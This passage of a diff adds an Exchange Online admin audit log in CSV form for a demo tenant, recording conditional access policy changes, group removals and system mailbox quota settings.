+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T16:56:12Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""3186830d-0921-4286-8ef3-275a389a2513""
+  }
+]"
+2020-05-05T16:48:07Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""7f2a9a9d-64c8-4426-82fe-0d1274140cfa""
+  }
+]"
+2020-05-05T16:47:31Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""9824fd55-ee80-488a-85c1-5e94e51ae4ce""
+  }
+]"
+2020-05-05T16:55:05Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""081f0f32-8f42-4770-adea-7f2e0eae7038""
+  }
+]"
+2020-05-05T17:24:06Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""72df3440-88f1-4702-99eb-36af6432c8bc""
+  }
+]"
+2020-05-05T17:23:30Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""09e7b068-ee8a-4c1f-9ad5-666ecf04d1f1""
+  }
+]"
+2020-05-05T16:17:19Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""c2beae47-283e-4e6a-a02d-097a4025c46b""
+  }
+]"
+2020-05-06T01:49:35Z,,,Install-DefaultSharingPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-06T01:49:44Z,,,Install-ResourceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-06T01:49:19Z,,,New-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-06T01:50:51Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  }
+]"
+2020-05-06T01:50:28Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:27Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:21Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:16Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:11Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:06Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:00Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:49:54Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""Management"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange Migration""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Migration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
